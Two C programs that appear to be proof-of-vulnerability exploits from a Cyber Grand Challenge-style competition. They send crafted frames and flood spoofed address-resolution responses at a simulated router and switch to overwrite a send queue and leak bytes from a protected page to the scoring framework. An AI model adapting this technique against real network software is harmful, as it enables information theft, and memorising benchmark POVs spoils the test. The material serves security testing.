int main(void) { unsigned int type2_addr; unsigned int type2_size; unsigned int type2_length; unsigned char Frame[MAX_FRAME_SIZE]; uint8_t Len; uint8_t EchoLen; pL2Hdr pL2 = (pL2Hdr)Frame; uint8_t i; // negotiate a Type2 POV with the Competition Framework NegotiateType2Pov(&type2_addr, &type2_size, &type2_length); // send a normally routed packet to build the L2 CAM tables in cb_switch bzero(Frame, MAX_FRAME_SIZE); BuildL4Segment(ECHO_L4ADDR, 0x41, (unsigned char *)"AA", 2, Frame); BuildL3Packet(0x0a010202, 0x0a010102, Frame); EchoLen = BuildL2Frame(0x0001, 0x1000, 0, Frame); SendBytes(STDOUT, Frame, EchoLen); // receive the ADP request that the router will generate when trying // to send back the echo response packet bzero(Frame, MAX_FRAME_SIZE); ReadBytes(STDIN, Frame, 19); // answer the ADP request bzero(Frame, MAX_FRAME_SIZE); Len = BuildAdpResponse(0x0a010102, 0x1000, 0x0001, 0x1000, 0, Frame); SendBytes(STDOUT, Frame, Len); // read the echo response bzero(Frame, MAX_FRAME_SIZE); ReadBytes(STDIN, Frame, EchoLen); for (i = 0; i < 4; i++) { // send a pwdgen request to cb_3 bypassing the router // use src L2 addr with 00 for last two bits bzero(Frame, MAX_FRAME_SIZE); BuildL4Segment(PWDGEN_L4ADDR, 0x41, (unsigned char *)"AA", 2, Frame); BuildL3Packet(0x0a010202, 0x0a010102, Frame); Len = BuildL2Frame(0xaaaa, 0x1000+i, 2, Frame); SendBytes(STDOUT, Frame, Len); // receive the pwdgen response // read in the L2hdr first ReadBytes(STDIN, Frame, L2_HDR_LEN); // read in the rest of the Frame ReadBytes(STDIN, Frame+L2_HDR_LEN, pL2->Len); // Parse the pwdgen response ParsePwdgenResponse(Frame, 4+i); } // send the recovered page bytes to the competition framework SendBytes(FRAMEWORK, decoded_magic_page+4, 4); }
int main(void) { unsigned int type2_addr; unsigned int type2_size; unsigned int type2_length; unsigned char Frame[MAX_FRAME_SIZE]; uint8_t Len; uint8_t EchoLen; pL2Hdr pL2 = (pL2Hdr)Frame; uint8_t i; fd_set readfds; int readyfds; struct timeval timeout; unsigned char *magic_bytes; // negotiate a Type2 POV with the Competition Framework NegotiateType2Pov(&type2_addr, &type2_size, &type2_length); // force the pov to sleep letting the router and cb_3 processes // exchange their echo packets so that SendQueue[0] has the desired // Frame data FD_ZERO(&readfds); FD_SET(STDIN, &readfds); timeout.tv_sec = 2; timeout.tv_usec = 0; fdwait(STDIN+1, &readfds, NULL, &timeout, NULL); // send 13 gratuitous ADP packets for different L3Addr's uint32_t L3Addr = 0x0a010110; for (i = 0; i < 13; i++, L3Addr++) { bzero(Frame, MAX_FRAME_SIZE); Len = BuildAdpResponse(L3Addr, 0x1001, 0x0001, 0x1000, 0, Frame); SendBytes(STDOUT, Frame, Len); } // send one more ADP which will overwrite SendQueue[0] // // the L3addr of the ADP header should point to a L3Addr that // has been previously populated in the router's ADP cache // // the L2Addr of the ADP header should overwrite the 1-byte Valid // with a non-zero value and the 1-byte Age field with 0xfe. bzero(Frame, MAX_FRAME_SIZE); Len = BuildAdpResponse(0x0a010102, 0x0001, 0x0001, 0x1000, 0, Frame); // ^ ^ // Age| |Valid SendBytes(STDOUT, Frame, Len); // Send enough packets to the original L3Addr we populated in the router's // ADP to cause it to age out. // The router will forward it back to VLAN 1, but to an unknown unicast L2Addr // so the switch will drop it for (i = 0; i < 8; i++) { bzero(Frame, MAX_FRAME_SIZE); BuildL4Segment(ECHO_L4ADDR, 0x41, (unsigned char *)"AA", 2, Frame); BuildL3Packet(L3Addr-1, 0x0a010102, Frame); EchoLen = BuildL2Frame(0x0001, 0x1000, 0, Frame); SendBytes(STDOUT, Frame, EchoLen); } // Finally, create ADP entry for the addr we over-wrote // allowing the queued packet to be sent bzero(Frame, MAX_FRAME_SIZE); Len = BuildAdpResponse(0x0a010102, 0x1000, 0x0001, 0x1000, 0, Frame); SendBytes(STDOUT, Frame, Len); // cgc_read in the ADP frame that'll be sent before the target frame bzero(Frame, MAX_FRAME_SIZE); ReadBytes(STDIN, Frame, sizeof(L2Hdr)+sizeof(L2Adjacency)+4); // see if we have a packet to cgc_read FD_ZERO(&readfds); FD_SET(STDIN, &readfds); timeout.tv_sec = 2; timeout.tv_usec = 0; if (fdwait(STDIN+1, &readfds, NULL, &timeout, &readyfds) != 0) { SendBytes(STDOUT, (unsigned char *)"diedie!", 7); bzero(Frame, MAX_FRAME_SIZE); SendBytes(FRAMEWORK, Frame, 4); _terminate(0); } if (readyfds == 0) { SendBytes(STDOUT, (unsigned char *)"diedie!", 7); bzero(Frame, MAX_FRAME_SIZE); SendBytes(FRAMEWORK, Frame, 4); _terminate(0); } // cgc_read the forwarded frame bzero(Frame, MAX_FRAME_SIZE); ReadBytes(STDIN, Frame, sizeof(L2Hdr)+sizeof(L3Hdr)+sizeof(L4Hdr)+4+4); // send the recovered page bytes to the competition framework magic_bytes = Frame+sizeof(L2Hdr)+sizeof(L3Hdr)+sizeof(L4Hdr); SendBytes(FRAMEWORK, magic_bytes, 4); }